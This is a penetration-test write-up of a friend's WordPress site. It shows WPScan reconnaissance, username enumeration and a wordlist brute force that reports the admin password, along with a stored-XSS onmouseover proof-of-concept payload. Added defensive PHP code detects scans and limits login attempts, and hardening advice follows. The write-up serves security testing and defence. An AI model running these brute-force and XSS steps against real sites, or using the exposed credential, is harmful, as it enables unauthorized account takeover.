A Friendly Security Test of a Friend's Website

Author: Cherishao (member of the 信安之路 author team and leader of its Incident Response Group)

Recruiting: the 信安之路 Incident Response Group is looking for like-minded members

A friend deployed a WordPress site and asked me to check its security when I had some time, and that is how this article came about. The original idea was that the WPScan + MSF combination would punch straight through, but reality is always full of surprises. This article follows the standard penetration-testing workflow built around WPScan: information gathering, vulnerability exploitation, and protective measures.

I. Environment

1. Test machine

The test machine's version is as follows:

root@ChengKaoAo:~# uname -a
Linux ChengKaoAo 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 GNU/Linux

2. Target environment

URL: https://sec.cherishao.com/
IP: 192.160.121.13

After reading this, interested readers can run the same tests against their own WordPress sites; experts, please ignore!!!

II. About WPScan

WPScan is a vulnerability scanner that ships with Kali Linux by default. It can enumerate a site's usernames, list all installed plugins and themes, identify the vulnerable ones and report the vulnerability details, and it can brute-force usernames and passwords on an unprotected WordPress site.

Kali ships with WPScan, but it has to be updated before use. My first update attempt failed because of a problem with the Kali package sources; after switching to updated Kali sources, running wpscan update produced the following:

root@ChengKaoAo:~# wpscan update
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

complete ok
[!] The WordPress URL supplied 'http://update/' seems to be down. Maybe the site is blocking wpscan so you can try the --random-agent

III. Information Gathering

1. WordPress version and related information

root@ChengKaoAo:~# wpscan -u 192.160.121.13

[i] The remote host tried to redirect to: https://sec.cherishao.com/
Y
[+] URL: https://sec.cherishao.com/
[+] Started: Wed Sep 4 09:49:52 2019

[+] robots.txt available under: 'https://sec.cherishao.com/robots.txt'
[!] The WordPress 'https://sec.cherishao.com/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <https://sec.cherishao.com/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips PHP/7.3.7
[+] Interesting header: X-POWERED-BY: PHP/7.3.7
[+] XML-RPC Interface available under: https://sec.cherishao.com/xmlrpc.php
[+] WordPress version 5.2.2 (Released on 2019-06-18) identified from meta generator, links opml
[+] WordPress theme in use: spacious - v1.6.3

[+] Name: spacious - v1.6.3
 |  Last updated: 2019-08-27T00:00:00.000Z
 |  Location: https://sec.cherishao.com/wp-content/themes/spacious/
 |  Readme: https://sec.cherishao.com/wp-content/themes/spacious/readme.txt
[!] The version is out of date, the latest version is 1.6.6
 |  Style URL: https://sec.cherishao.com/wp-content/themes/spacious/style.css
 |  Theme Name: Spacious
 |  Theme URI: https://themegrill.com/themes/spacious
 |  Description: Spacious is an incredibly spacious multipurpose responsive theme coded & designed with a lot of c...
 |  Author: ThemeGrill
 |  Author URI: https://themegrill.com

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: wedocs - v1.5
 |  Latest version: 1.5 (up to date)
 |  Last updated: 2019-07-11T05:33:00.000Z
 |  Location: https://sec.cherishao.com/wp-content/plugins/wedocs/
 |  Readme: https://sec.cherishao.com/wp-content/plugins/wedocs/readme.txt

[+] Finished: Wed Sep 4 09:50:01 2019
[+] Requests Done: 53
[+] Memory used: 107.57 MB
[+] Elapsed time: 00:00:08

The sensitive information collected:

Version: WordPress version 5.2.2 (Released on 2019-06-18)
Paths: /robots.txt, /readme.html, /wp-login.php
Theme: spacious - v1.6.3, the latest version is 1.6.6
Other: SERVER: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips PHP/7.3.7

2. Enumerating exploitable plugins

root@ChengKaoAo:~# wpscan -u 192.160.121.13 --enumerate vp

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:02:00 <=====================================================================================================================================> (2060 / 2060) 100.00% Time: 00:02:00

[+] We found 1 plugins:

[+] Name: akismet
 |  Latest version: 4.1.2
 |  Last updated: 2019-05-14T15:05:00.000Z
 |  Location: https://sec.cherishao.com/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
[i] Fixed in: 3.1.5

[+] Finished: Wed Sep 4 10:03:16 2019
[+] Requests Done: 2121
[+] Memory used: 224.039 MB
[+] Elapsed time: 00:02:12

The Akismet plugin is reported with an XSS. Risk items found at this stage are only a reference; actual verification is what counts.

3. Enumerating WordPress usernames

root@ChengKaoAo:~# wpscan -u 192.160.121.13 --enumerate u

[+] Enumerating plugins from passive detection ...
 | 1 plugin found:

[+] Name: wedocs - v1.5
 |  Latest version: 1.5 (up to date)
 |  Last updated: 2019-07-11T05:33:00.000Z
 |  Location: https://sec.cherishao.com/wp-content/plugins/wedocs/
 |  Readme: https://sec.cherishao.com/wp-content/plugins/wedocs/readme.txt

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+----------+-----------------------+
    | Id | Login    | Name                  |
    +----+----------+-----------------------+
    | 1  | admin    | admin – cherishao     |
    +----+----------+-----------------------+

[+] Finished: Wed Sep 4 10:08:11 2019
[+] Requests Done: 67
[+] Memory used: 108.809 MB
[+] Elapsed time: 00:00:12

IV. Vulnerability Exploitation (Verification)

1. Password brute-forcing

From the sensitive information gathered in step 1, we can search Google for exploitable vulnerabilities in these Apache and PHP versions, and we also learn that the admin login path is /wp-login.php. Combined with the username enumerated in step 3, we can build a wordlist and attempt a brute force.

root@ChengKaoAo:~# wpscan -u 192.160.121.13 --wordlist /root/dic.txt --username admin

[+] Starting the password brute forcer
[!] ERROR: We received an unknown response for login: admin and password: admin2019
  Brute Forcing 'admin' Time: 00:02:00 <===================================================== > (2108 / 2109) 99.95% ETA: 00:00:00

Trying common weak passwords here turned up password: admin2019. A small moment of quiet delight, then on to verifying the stored XSS the scan reported :)
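As an added example that is not part of the original article, here is a PHP script a site owner could run over Apache access logs to spot the footprint that the information-gathering and brute-force steps above leave behind; the log lines, client IPs, WPScan User-Agent string and alert threshold are constructed assumptions, not data from the tested site.

```php
<?php
// Added example, not from the original article: scan Apache "combined" access-log
// lines for the footprints the WPScan runs above leave behind: recon requests
// (readme.html, xmlrpc.php, ?author=N, the REST users route) and a burst of POSTs
// to wp-login.php from one client. IPs, log lines, User-Agent and threshold are assumed.
const RECON_PATHS = ['/readme.html', '/xmlrpc.php', '/wp-json/wp/v2/users'];
const LOGIN_BURST = 10;   // assumed: POSTs to wp-login.php per IP before alerting

function parse_log_line(string $line): ?array {
    // ip ident user [time] "METHOD TARGET PROTO" status size "referer" "user-agent"
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "[^"]*"/';
    return preg_match($re, $line, $m) ? ['ip' => $m[1], 'method' => $m[2], 'target' => $m[3]] : null;
}

function analyse_access_log(array $lines): array {
    $recon = [];        // ip => recon targets requested
    $login_posts = [];  // ip => count of POST /wp-login.php
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null) {
            continue;   // not combined format; skip
        }
        $path = parse_url($r['target'], PHP_URL_PATH);
        $qs   = parse_url($r['target'], PHP_URL_QUERY);
        parse_str(is_string($qs) ? $qs : '', $query);
        if (in_array($path, RECON_PATHS, true) || isset($query['author'])) {
            $recon[$r['ip']][] = $r['target'];
        }
        if ($r['method'] === 'POST' && $path === '/wp-login.php') {
            $login_posts[$r['ip']] = ($login_posts[$r['ip']] ?? 0) + 1;
        }
    }
    return [
        'recon'       => $recon,
        'brute_force' => array_filter($login_posts, fn($n) => $n >= LOGIN_BURST),
    ];
}
// Constructed sample: one client does recon and then a 12-request login burst,
// while a second client browses normally and must not be flagged.
$ua = 'WPScan v2.9.3 (https://wpscan.org)';   // assumed scanner User-Agent
$sample = [
    "203.0.113.7 - - [04/Sep/2019:09:49:52 +0800] \"GET /readme.html HTTP/1.1\" 200 7447 \"-\" \"$ua\"",
    "203.0.113.7 - - [04/Sep/2019:09:49:53 +0800] \"GET /?author=1 HTTP/1.1\" 301 0 \"-\" \"$ua\"",
    "198.51.100.2 - - [04/Sep/2019:09:50:00 +0800] \"GET /index.php/2019/09/hello/ HTTP/1.1\" 200 31020 \"-\" \"Mozilla/5.0\"",
];
for ($i = 0; $i < 12; $i++) {
    $sample[] = sprintf('203.0.113.7 - - [04/Sep/2019:10:08:%02d +0800] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "%s"', $i, $ua);
}
print_r(analyse_access_log($sample));   // both 'recon' and 'brute_force' list 203.0.113.7 only
```

In production the same logic would be fed from the live access log and the threshold tuned to the site's normal login volume; a User-Agent match alone is not enough, since WPScan's --random-agent option hides it.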

2. Verifying the plugin XSS

1) Vulnerability details

According to https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html, the title attribute of the plugin's <abbr> tag can be truncated with a single quote.

<abbr title='" class="comment-link"><a href='href="'> :-) <abbr title='" ' class="comment-link">x</abbr></a>

With the principle understood, we can build a PoC as follows. If the XSS markup is parsed normally, hovering the mouse over the comment triggers the payload:

<abbr class="comment-link" '="" href="'> :-) <abbr title='" onmouseover="alert(1338);"title="" class="comment-link"><a href=">xss?</abbr>

No time like the present: let's submit a comment and see, planting the crafted XSS in the comment form.

After the comment was posted, the emoji was still there. Nani?! My guess was that the plugin is not enabled, or that the newer WordPress version filters it.

A look in the admin backend confirmed that it did not execute.

Checking the plugin's activation status: not enabled...

V. Protective Measures

1. Protection against password brute-forcing

1) Prevent the WordPress user list from being enumerated: do not use the username as the display name (nickname), and do not use a username that is already widely known. The best approach is a username containing random characters, with a different name as the nickname.

2) Limit the number of login attempts per IP address. Many WordPress plugins implement this; for example, Brute Force Login Protection (of course, you can also write your own script to keep your password from being brute-forced).

2. Preventing scans of plugins, themes and TimThumb files

Use the Block Bad Queries (BBQ) plugin, which can block and ban this kind of scanning.
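As an added example that is not from the article or from the plugins it names, the following must-use plugin implements measures 1) and 2) directly in WordPress: it counts failed logins per IP and refuses further attempts for a cooling-off period, and it closes the username-enumeration routes seen in the scan above; the lal_* names and the limits are assumptions.

```php
<?php
/**
 * Plugin Name: Login Attempt Limiter (added example)
 * Illustrative mu-plugin (wp-content/mu-plugins/), written for this article and
 * not taken from it or from the plugins it names. Failed logins are counted per
 * client IP in a transient and further attempts are refused for a cooling-off
 * period; the enumeration routes WPScan relies on (?author=N and the REST users
 * route) are closed. The limits are assumptions; tune them for your site.
 */
const LAL_MAX_FAILURES = 5;                       // failed attempts per window
const LAL_WINDOW       = 15 * MINUTE_IN_SECONDS;  // counting / lockout window
function lal_key(): string {
    // Keyed on REMOTE_ADDR only: honouring X-Forwarded-For without a trusted
    // proxy would let a client choose which bucket gets locked out.
    return 'lal_fail_' . md5($_SERVER['REMOTE_ADDR'] ?? '0.0.0.0');
}
// Count every failed login for this IP (fires for wp-login.php and XML-RPC alike).
add_action('wp_login_failed', function () {
    set_transient(lal_key(), (int) get_transient(lal_key()) + 1, LAL_WINDOW);
});
// Priority 30 runs after WordPress's own password check (priority 20), so the
// lockout holds even when the guessed password happens to be right.
add_filter('authenticate', function ($user) {
    if ((int) get_transient(lal_key()) >= LAL_MAX_FAILURES) {
        return new WP_Error('lal_locked', 'Too many failed logins; try again later.');
    }
    return $user;
}, 30, 1);

// A successful login clears the counter for that IP.
add_action('wp_login', function () { delete_transient(lal_key()); });
// Stop /?author=N from redirecting to /author/<login>/, which reveals the login
// name; priority 1 runs before redirect_canonical() would perform that redirect.
add_action('template_redirect', function () {
    if (is_author() || isset($_GET['author'])) {
        wp_safe_redirect(home_url('/'), 301);
        exit;
    }
}, 1);

// Hide the REST user listing from anonymous clients.
add_filter('rest_endpoints', function (array $endpoints) {
    if (!is_user_logged_in()) {
        unset($endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)']);
    }
    return $endpoints;
});

// Drop the "meta generator" tag that gave away the version in the scan above.
remove_action('wp_head', 'wp_generator');
```

Note that a lockout keyed on the client IP is a blunt instrument behind NAT or a CDN, and readme.html and xmlrpc.php still need to be handled at the web-server level (delete the file, deny the path).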

VI. Reflections and Summary

When doing security testing, gather as much usable information as possible: know yourself and know your enemy, and you will never lose a battle. Likewise, as the guardian of your own site, understanding the tools and the thinking that attackers use can sometimes yield results out of all proportion to the effort.